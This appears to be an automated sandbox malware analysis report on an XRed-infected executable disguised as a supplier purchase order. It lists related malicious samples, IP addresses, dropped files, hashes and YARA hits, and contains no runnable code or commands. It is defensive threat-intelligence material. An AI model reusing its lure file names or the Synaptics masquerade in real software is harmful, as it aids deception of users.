AWKNET-LLCUS | RezQY7jWu8.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | Dzsb.Qyd.Install.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | Bank Information Details.bat | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | System Volume Information.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | P4.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | Supplier RFQ ID 365242213q___________________________pdf.exe | malicious | Snake Keylogger, XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | RNEQTT.exe | malicious | LodaRAT, XRed | 142.250.181.14, 142.250.181.97
37f463bf4616ecd445d4a1937da06e19 | installer.msi | malicious | Unknown | 142.250.181.14, 142.250.181.97
37f463bf4616ecd445d4a1937da06e19 | #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1 | malicious | Unknown | 142.250.181.14, 142.250.181.97
37f463bf4616ecd445d4a1937da06e19 | T1#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Nitol | 142.250.181.14, 142.250.181.97
37f463bf4616ecd445d4a1937da06e19 | Canvas of Kings_N6xC-S2.exe | malicious | Unknown | 142.250.181.14, 142.250.181.97
37f463bf4616ecd445d4a1937da06e19 | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 142.250.181.14, 142.250.181.97
37f463bf4616ecd445d4a1937da06e19 | installer.msi | malicious | Unknown | 142.250.181.14, 142.250.181.97
37f463bf4616ecd445d4a1937da06e19 | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 142.250.181.14, 142.250.181.97
37f463bf4616ecd445d4a1937da06e19 | Violated Heroine_91zbZ-1.exe | malicious | Unknown | 142.250.181.14, 142.250.181.97
37f463bf4616ecd445d4a1937da06e19 | 3gPZmVbozD.msi | malicious | Unknown | 142.250.181.14, 142.250.181.97
                                                                                                                                No context
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):118
                                                                                                                                Entropy (8bit):3.5700810731231707
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                MD5:573220372DA4ED487441611079B623CD
                                                                                                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.06951502427271773
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:QzQ8WMlQOH2lI6WMlmkvfdn0lA1C1TDWJU1CrnwZogQ9iZ1yB5d:QzQ8WkQ97WkzvFcAA1+JUArn6PRO5d
                                                                                                                                MD5:D51301E98D5742E2E7F6BEE4D54416BB
                                                                                                                                SHA1:55359CA34FD7029E998411E70C553FA0BAE1AC34
                                                                                                                                SHA-256:BE3E0CC9ED95ADBEBFF7E31EB96AD0D7E3526964F5F4DBA716899FB8F59CDE74
                                                                                                                                SHA-512:3A72CF170199FDCB4093056358DFD8C6BFFF7E23A0F02B78EB59946BEBB0B3E2F8902BD1732DBBB8D61C5F8CBD5BF1071222700EFE23E287110272CC31E70DC4
                                                                                                                                Malicious:false
                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.3.4.5.1.2.9.4.9.7.8.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.3.4.5.3.9.5.9.0.4.0.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.8.3.d.5.8.7.-.3.b.9.6.-.4.6.e.b.-.9.a.c.6.-.8.5.0.4.e.7.5.b.9.e.f.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.7.f.4.9.7.3.-.0.4.4.e.-.4.b.f.4.-.9.3.5.f.-.1.d.f.b.9.d.5.6.7.c.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.1371276189919388
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:dKFcVpsOII0C/ay5xXDzJDzqjLOA/FFmOVzuiFDZ24IO8EKDzy:00yOOC/ay5hJqjEqzuiFDY4IO8zy
                                                                                                                                MD5:F2ACE7CCC055537CF8DB10959BA0EAA6
                                                                                                                                SHA1:07804EEC19F8C2DB8DD714CEFA31D32D7127A8E2
                                                                                                                                SHA-256:27EAF04BE55C7442BED21B4030A9483D922CB42A9CF1F04F9AF03B6020D41076
                                                                                                                                SHA-512:D5C19D3B09C54F5599EB90C55ADB76748276A461790DD40698421BD92D0C1AC8C5A6251252F89597235218E22DBCF336FCBD8E16656D9C3068B22B331EEF89F7
                                                                                                                                Malicious:false
                                                                                                                                 Preview:Version=1 EventType=APPCRASH EventTime=133795345450501302 ReportType=2 Consent=1 UploadTime=133795346170344810 ReportStatus=524384 ReportIdentifier=eb3bbace-472b-477f-a593-7d3f2b06a824 IntegratorReportIdentifier=607d1602-cd31-4781-9f94-9aab7f0a274c Wow64Host=34404 Wow64Guest=332 NsAppName=Synaptics.exe AppSessionGuid=00000fec-0001-0014-f5f7-c70f2856db01 TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!0000c342e26972c1ee78b8409998386e0212234f6b80!Synaptics.exe TargetAppVe
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.06964971902783561
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:QzQ8WkRl97Wk0KOA8xbJAHlHglB+oRO5d:kiQl9SPKONbJ4YB+z
                                                                                                                                MD5:77AEC1A056C858B2AEC33328D0A87093
                                                                                                                                SHA1:A506444D093200CAA43413A6890728829B8D1C96
                                                                                                                                SHA-256:599386C7D939004C125FA265F20B5E4F64C356053A9033127F3DCA51026D6B68
                                                                                                                                SHA-512:45D9099CF55FA6D070E07FAD6B61D9C82F5315F3EFEAFFEC188EEB8FDAF3A751FEBDB85B74194E6EE8A9E55AA2668DE05A22CD723E798103C10E5A84B90E9096
                                                                                                                                Malicious:false
                                                                                                                                 Preview:Version=1 EventType=APPCRASH EventTime=133795346248891787 ReportType=2 Consent=1 UploadTime=133795346381079143 ReportStatus=655456 ReportIdentifier=ade2be3c-2921-4830-8bbf-2410d8bfe9ef IntegratorReportIdentifier=5e8bb184-c1fa-4213-9841-ac61e8c86105 Wow64Host=34404 Wow64Guest=332 NsAppName=Synaptics.exe
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 17:22:03 2024, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8551664
                                                                                                                                Entropy (8bit):2.3104446929642766
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:RLuxjkYRbaUUf0G7v68KZPNSY2eWCRu2JHr3PcPOFI7tzCBPHpuWqFItm5r8joRI:ZutdYmdPL4U3PUOStzCBPHSFItgrTe
                                                                                                                                MD5:0DF66DFA570C3DE2CA3E0CD7274ECA00
                                                                                                                                SHA1:385CDA2AE3CA765B3F29097C62211E72056EE223
                                                                                                                                SHA-256:29888F74F171896C43285F6BCA48A4FB8C21C84FF79D4259792E0A6FCB9273BF
                                                                                                                                SHA-512:A759C4EA93D18E4C996A01D7032A70F739F73FEC4A3DAF86EBA2B412D31218E37AAE317096AE857505C3FECCFAC714254749B0A8DA065CDE02F6BB288BBBA42C
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6338
                                                                                                                                Entropy (8bit):3.720373109006611
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:R6l7wVeJoxU6kw19YiSeDprE89b9ysf3+3fm:R6lXJ36kw19Y2/9xf3+u
                                                                                                                                MD5:65A001C45C296E8C276F3F1851A925B0
                                                                                                                                SHA1:190ABE3814EDFF66D122DB63A9F0828C6A0010F4
                                                                                                                                SHA-256:EC5CBA1997B250E284D058F52DA00BE87C5A8FE84DC777FEEFEE45A54740FE82
                                                                                                                                SHA-512:534EBE0FD81E04857AF4650F2195B1D738A39835DBEBF002D7A36D42B08893042EF73A159876E5A7577D8D3F65C59B38F01DBFE67E5D9C6D4AE4E7625E5DD908
                                                                                                                                Malicious:false
                                                                                                                                 Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4076</Pi
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4572
                                                                                                                                Entropy (8bit):4.4521185551347875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwWl8zs6Jg77aI938WpW8VY0Ym8M4JFQFxMt+q84iMzZ3d:uIjfII7F17V8JttgMzZ3d
                                                                                                                                MD5:F6EBBCF50316A3A08D31424C0DA4B59C
                                                                                                                                SHA1:C2790FE664F863692E6DA1BDAC5223A7288AC256
                                                                                                                                SHA-256:2FAC0E2B186D3653F1FBABBE1F204865E7F219C714EAF5E2057A5BDB6ECCD440
                                                                                                                                SHA-512:9E8C4AC26F56B4978E60D7536A8E96F2E903CAC78AB8E9EB2BE439BEE1F749AE6F6311538A3887853EA8F9D1D3CE6F30B24183249BF89D913F84D35D310937CB
                                                                                                                                Malicious:false
                                                                                                                                 Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="19045" /> <arg nm="vercsdbld" val="2006" /> <arg nm="verqfe" val="2006" /> <arg nm="csdbld" val="2006" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="2057" /> <arg nm="geoid" val="223" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="645625" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.789.19041.0-11.0.1000" /> <arg nm="portos" val="0" /> <arg nm="ram" val="409
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 17:22:50 2024, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):15048716
                                                                                                                                Entropy (8bit):1.8808476074898084
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:g6WvRyGEXOEKK1e97C6yd7QFJ7NPcBYekFCPmw0Yj4L6UOn:U0GEGR97CDdsn7tcBsCPlj4L6UO
                                                                                                                                MD5:06CD5D094DFDF7CC0C72EDAE89F4FA63
                                                                                                                                SHA1:F33D8804AE829FCA63C62B934F32DDFAE65BE424
                                                                                                                                SHA-256:92098C447FA01FE6BC14A2EDF05CC0B05DC753E29A6C1F89F38AACBD0D125797
                                                                                                                                SHA-512:07B702975258B066110C3A5DF4D64021FA042C6A37B914561F249BA923A10784A0879733A4AA6FCAFBAD52ABBA3BB507BAF90F5697415920738D5325313D16D0
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6370
                                                                                                                                Entropy (8bit):3.729028757520049
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:R6l7wVeJoxwh6Fn5vYiQhKdgxLpD789bpysfOjm:R6lXJRh6F5vYvGgkpxf7
                                                                                                                                MD5:B904249CBC7397068F39375F34B78130
                                                                                                                                SHA1:898A789557B59205F466FE254B19698FE7F72C60
                                                                                                                                SHA-256:64D8A532F4CC415EA05ED52260F04CF82031331DE2FCC8D18028F4CFC6CADB5D
                                                                                                                                SHA-512:C951E339A8D0A2158F50CDD212B8819CC9FBF8EB5F3B2D38BFC12BED4F69E6F1B365BD3781DA99F291239B02F9A530703310BF860D39D679BF396F607CE44D5A
                                                                                                                                Malicious:false
                                                                                                                                 Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4076</Pi
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4614
                                                                                                                                Entropy (8bit):4.489925708611387
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwWl8zsPJg77aI938WpW8VYncYm8M4JFRFke+q8dMMzZ3d:uIjfxI7F17V+5Jr/MzZ3d
                                                                                                                                MD5:71C48D1932F648955A9459062C6D8ABD
                                                                                                                                SHA1:8C073D32B77F93708A05FC8E807AA0CBD40945F0
                                                                                                                                SHA-256:C5814309D5F40C3F49506A4F5D6D13CAAC3ED803AA5E98F4B43A5635A6EE4533
                                                                                                                                SHA-512:CDE9018A1B56FC2E8765C11022BC69D2928543AF57D0DB19E776F3DD0340EF622523120BF9BFDB46D7D49E7AC9AC71107A9F16A5BD78FD5D5F7BE3F7C2327B3C
                                                                                                                                Malicious:false
                                                                                                                                 Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="19045" /> <arg nm="vercsdbld" val="2006" /> <arg nm="verqfe" val="2006" /> <arg nm="csdbld" val="2006" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="2057" /> <arg nm="geoid" val="223" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="645626" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.789.19041.0-11.0.1000" /> <arg nm="portos" val="0" /> <arg nm="ram" val="409
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Dec 24 17:23:47 2024, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):282490
                                                                                                                                Entropy (8bit):2.71715559281092
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:nCBAgCSeuQwPx/51zq2Swbvk3oYs59rx4oaw5ceoAe6Q0hAaYP:nxvSe4/FDSoYs5FxCB
                                                                                                                                MD5:51E5A5E2E3EF77EB85BD18B8AB730F6E
                                                                                                                                SHA1:DE13F3A0F06E19FF09A740924EC1E1C3E2573B5F
                                                                                                                                SHA-256:3945E529A7A8BC116676C671F639829EA8BC7865FFB8D487BF4BEB57090D62D3
                                                                                                                                SHA-512:E269F2894D18ED3620158707AB850A1609A8E21CA406936B6FFFF37F2E144F24D860AE079CF1DF5290D5C3B82B149BADA8442AF3D1E57894E750CF00BB180C8D
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6340
                                                                                                                                Entropy (8bit):3.7004337077919875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:R6l7wVeJox065MYirJkBpDu89bH6sf07GNm:R6lXJH65MYGJkTHZfY
                                                                                                                                MD5:A98AF8403FEE7E67B443C0834DB84075
                                                                                                                                SHA1:AC02B934F41D6A46C1BAD7F08028500D61195294
                                                                                                                                SHA-256:6B9B45FD2A8F849245B7D7E93074C9324CD41FB9BB2EBF987359EE74D8D958F0
                                                                                                                                SHA-512:B193DB333C849C08785F93AC0648D0BC4334A4E003EA18AF2B81778B3C70783C02522EB94721A29DBD475192BFCA7E8E39E0E65670F3C6EA7616EC5F5481264B
                                                                                                                                Malicious:false
                                                                                                                                 Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4076</Pi
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4580
                                                                                                                                Entropy (8bit):4.44888730288185
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwWl8zsPJg77aI938WpW8VYeYm8M4JFFFah+q8Z+MzZ3d:uIjfxI7F17VmJErMzZ3d
                                                                                                                                MD5:7D743C58589301A498A7A591E6330458
                                                                                                                                SHA1:F0EB473ABC291C0984AB04E3E46330B1360421DB
                                                                                                                                SHA-256:77179A6C0993D378EFA6A6BD8346933825F53093C9AFCB036BBCF8615CB8BF9D
                                                                                                                                SHA-512:0180327D8E490CD88F7A54BC74F56D66B682585D36A6478F9D6773E6DB96AB1FB119AA55DA9D0A04C918CEB3B46F1481BB1311F9DBDBCF41034D3565B0706E83
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645626" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                Process:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):771584
                                                                                                                                Entropy (8bit):6.6311521779536164
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I+mr:ansJ39LyjbJkQFMhmC+6GD9f6
                                                                                                                                MD5:B30E717CDE0FA4A5DE907A7148308430
                                                                                                                                SHA1:C342E26972C1EE78B8409998386E0212234F6B80
                                                                                                                                SHA-256:12C8A50563F8B33F2613CA55AEE26FBE5473D68593D8E10E13C4D44D258B4E2A
                                                                                                                                SHA-512:B6FEB72243722ABE8F7E35784ABC386D9373BD652722334A1E2FB5B614CD857E1EB8A44C7593D2C1AB347C490E63371D3AB5FA4698D3BF3A63EC88A897A7440C
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX76FB.tmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX76FB.tmp, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Process:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1684992
                                                                                                                                Entropy (8bit):7.4649180860888515
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:gnsHyjtk2MYC5GDGfhloJfKoKqh1X+T9f8z:gnsmtk2aNfhlHoKqzX+Sz
                                                                                                                                MD5:17FB4F9DF5175E684A3427C5997B2007
                                                                                                                                SHA1:C7B207497E0171FBB8FCA648D82753ABBF42B0B8
                                                                                                                                SHA-256:8F66247597F18A7B3F20DBDF2D29330F716222BD500A7A95642137E84FA3B3D3
                                                                                                                                SHA-512:ED454B9588AB5209A926395C03B7E1EE35231BB77F66895187EBE86A3E94FC3568A247983946021887DEF3E4F396705142134ABFDEB857B9E040DD863FE6D51D
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                Process:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:true
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.266024945068794
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+04v0SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f0+pAZewRDK4mW
                                                                                                                                MD5:F0F52BEBF1D0EB05BEDD557B91D5BA90
                                                                                                                                SHA1:A91FE63DBB45E06E5DA975D0A49DA5FA18CAF143
                                                                                                                                SHA-256:D2B190369ADA9AF79489BA9BE6A5897ED1ECEDBDBA18E8A0F9DF7FF0017EC83D
                                                                                                                                SHA-512:BCCCF8951329F3863AC5BAAFCFAD28ECEC70BBEE1F8BB59270C5E8505E8C700AFA6479E26F17A3214D214BC24A11DE0D841BDDD7688B39A044B7A42366B262D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9dRJ9c_3_d9cP2zIV4DW3g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.253720510294435
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0JIzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dz+pAZewRDK4mW
                                                                                                                                MD5:ADFAAEE39DFD6C8E824BB1206BB5934A
                                                                                                                                SHA1:930AB92E0932F691FF0EFDDD32793BA214C25F65
                                                                                                                                SHA-256:F7E6560D8107B37A67D31561945E921D9856D8252A87B8433A01E3A4E650407D
                                                                                                                                SHA-512:17FECC1B7E4F021E51305AD1B67CBB9FF8D246F759E7AFB1A7C21660BE31A0BAF1C843E4664F14A2E3CFE662DB3BFFEB9BCA45105B4CAFE1AC9632063B044CA8
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ovq8vn_m_npslSqd859XBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.266764521872147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0FUZXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hV+pAZewRDK4mW
                                                                                                                                MD5:BC02B0605BEBD914F3E10B1B4CCB4F90
                                                                                                                                SHA1:FA709F9F8FC7BCD211F51C2800BFAAC25C183F78
                                                                                                                                SHA-256:51FFC0A0E1AB77C1C74E8CAE6F089E259799E9583A128079EC549E7692BA95B6
